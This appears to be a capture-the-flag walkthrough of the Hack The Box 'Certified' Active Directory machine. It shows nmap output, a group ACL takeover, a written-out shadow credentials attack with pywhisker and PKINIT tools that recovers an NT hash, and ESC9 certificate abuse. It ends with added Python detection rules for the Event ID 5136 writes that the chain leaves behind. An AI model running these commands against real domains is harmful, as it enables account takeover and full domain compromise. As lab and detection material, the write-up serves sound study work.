As is common in Windows pentests, you start the Certified box with credentials for the following account:
Username: judith.mader
Password: judith09
Recon
Starting off with an nmap SYN scan over all ports:
sudo nmap -sS -Pn -n -p- 10.10.11.41 -oN all_syn.txt
#Output:
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49666/tcp open unknown
49668/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49683/tcp open unknown
49716/tcp open unknown
49739/tcp open unknown
55012/tcp open unknown
Using these open ports for a follow-up version/script scan:
Enumeration
This looks to be a domain controller. The ports available for enumeration are LDAP and SMB.
I tried a few ways; LDAP enumeration shows heavy AD CS use, so we will use Certipy:
This looks to be vulnerable:
Our user is not in the operator ca group:
Foothold
We are not in the group. Let's Kerberoast management_svc, since LDAP shows it is Kerberoastable:
Let's sync our clocks:
Setting the clock to match it:
Let's run impacket again:
Uncrackable.
I tried various ways, but everything fails. Weird.
BloodHound says we have WriteOwner permissions over management@certified.htb:
I am trying to get this.
So, let's name ourselves the new owner of the group:
Let's now add a new ACE that gives us WriteMembers over Management:
Let's now add ourselves to the group:
Verifying via LDAP query:
After a few minutes/hours, I realized the path does not want us to change the management_svc password, but maybe to do a shadow credentials attack.
Sweeeeet!!! We got the pfx!
Let's get the damn TGT now!
Getting the NT Hash for management_svc:
PrivEsc
Change the ca_operator password:
Let's get a pfx:
I checked the templates again as operator ca:
Ran the ESC9 PrivEsc attack:
Setting the UPN of ca_operator to Administrator so that we can retrieve the Administrator .pfx:
PORTS=$(grep "open" all_syn.txt | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/,$//'); sudo nmap -sVC -Pn -n -p ${PORTS} -oN vuln_scan.txt 10.10.11.41
#Output:
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-04-28 01:57:29Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-28T01:59:01+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-28T01:59:00+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-28T01:59:01+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
|_ssl-date: 2025-04-28T01:59:00+00:00; +7h00m00s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49683/tcp open msrpc Microsoft Windows RPC
49716/tcp open msrpc Microsoft Windows RPC
49739/tcp open msrpc Microsoft Windows RPC
55012/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
pywhisker -d certified.htb -u "judith.mader" -p 'judith09' --target "management_svc" --action "add" --filename DC$
[*] Searching for the target account
[*] Target user found: CN=management service,CN=Users,DC=certified,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 72aac68b-a642-54bc-762a-ffb8da93b1f0
[*] Updating the msDS-KeyCredentialLink attribute of management_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] Converting PEM -> PFX with cryptography: DC$.pfx
[+] PFX exportiert nach: DC$.pfx
[i] Passwort für PFX: bQWW4lwVnl1BCxOFZyaF
[+] Saved PFX (#PKCS12) certificate & key at path: DC$.pfx
[*] Must be used with password: bQWW4lwVnl1BCxOFZyaF
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
python3 /home/czr/HTB/Timelapse/Enum/winrm/PKINITtools/gettgtpkinit.py -cert-pfx DC$.pfx -pfx-pass 'bQWW4lwVnl1BCxOFZyaF' 'certified.htb/management_svc' DC$.ccache
2025-04-28 07:56:57,074 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-04-28 07:56:57,104 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
2025-04-28 07:57:18,779 minikerberos INFO AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-04-28 07:57:18,779 minikerberos INFO f4f2c6c8b96c9117b0d5933334a73510fe5674a24719a208a0ff84ca58cc221d
INFO:minikerberos:f4f2c6c8b96c9117b0d5933334a73510fe5674a24719a208a0ff84ca58cc221d
2025-04-28 07:57:18,782 minikerberos INFO Saved TGT to file
INFO:minikerberos:Saved TGT to file
sudo python3 /home/czr/HTB/Timelapse/Enum/winrm/PKINITtools/getnthash.py -key f4f2c6c8b96c9117b0d5933334a73510fe5674a24719a208a0ff84ca58cc221d certified.htb/management_svc
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
a091c1832bcdd4677c28b5a6a1295584
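Every step of this chain is an attribute write on a directory object (nTSecurityDescriptor and member on the Management group, the msDS-KeyCredentialLink update in the pywhisker output above, userPrincipalName on ca_operator), and each surfaces as Event ID 5136 (Directory Service Changes) wherever the object's SACL audits writes to that attribute. The following is an added example, not part of the original writeup or of any tool used in it, that runs simple detection rules over constructed 5136-style records; the sample subjects, DNs and values are assumptions modelled on the box, and the self-write check compares the subject name to the object's CN only as an approximation of a SID comparison.

```python
import re

# Constructed sample Event ID 5136 (Directory Service Changes) records, reduced to
# (subject, object DN, object class, attribute, new value); all are "Value Added"
# operations. Values are modelled on the Certified chain above; this is not a real log.
SAMPLE_EVENTS = [
    ("judith.mader", "CN=Management,CN=Users,DC=certified,DC=htb", "group", "nTSecurityDescriptor", "O:S-1-5-21-<sid>-1103D:..."),
    ("judith.mader", "CN=Management,CN=Users,DC=certified,DC=htb", "group", "member", "CN=Judith Mader,CN=Users,DC=certified,DC=htb"),
    ("judith.mader", "CN=management service,CN=Users,DC=certified,DC=htb", "user", "msDS-KeyCredentialLink", "B:828:00020000..."),
    ("management_svc", "CN=ca_operator,CN=Users,DC=certified,DC=htb", "user", "userPrincipalName", "Administrator"),
    ("DC01$", "CN=DC01,OU=Domain Controllers,DC=certified,DC=htb", "computer", "msDS-KeyCredentialLink", "B:828:00020000..."),  # benign self-write
]

def cn_of(dn):
    """Leading RDN value of a DN: 'Management' for 'CN=Management,CN=Users,...'."""
    m = re.match(r"^[A-Za-z]+=([^,]+)", dn)
    return m.group(1) if m else dn

def same_principal(subject, object_dn):
    """Rough self-write test ('DC01$' vs CN 'DC01'). Production logic should compare
    SIDs: CN and sAMAccountName legitimately differ for many user objects."""
    return subject.rstrip("$").lower() == cn_of(object_dn).lower()

def analyze(events):
    """Return (rule, subject, object DN) findings for the attribute writes this chain leaves."""
    findings = []
    acl_changed = set()  # (subject, group DN) pairs whose security descriptor was rewritten
    for subj, dn, obj_class, attr, value in events:
        if attr == "nTSecurityDescriptor" and obj_class == "group":
            # Owner or DACL rewrite on a group: what WriteOwner / WriteDacl abuse leaves behind.
            acl_changed.add((subj, dn))
            findings.append(("group-acl-or-owner-change", subj, dn))
        elif attr == "member" and (subj, dn) in acl_changed:
            # Same principal rewrote the ACL and then adds a member: the
            # WriteOwner -> WriteMembers -> add-self sequence used above.
            findings.append(("acl-change-then-member-add", subj, dn))
        elif attr == "msDS-KeyCredentialLink" and not same_principal(subj, dn):
            # Key credentials are normally written by the account itself (WHfB, device
            # registration); another principal writing them is the shadow credentials pattern.
            findings.append(("keycredentiallink-written-by-other-principal", subj, dn))
        elif attr == "userPrincipalName" and value.split("@")[0].lower() != cn_of(dn).lower():
            # UPN re-pointed at a different account name: the ESC9 precursor (ca_operator -> Administrator).
            findings.append(("upn-mismatch", subj, dn))
    return findings

if __name__ == "__main__":
    for rule, subj, dn in analyze(SAMPLE_EVENTS):
        print(f"{rule:45} {subj:15} {dn}")
```

The benign DC01$ record is deliberately left unflagged to show that the key-credential rule keys on who wrote the attribute, not on the attribute alone.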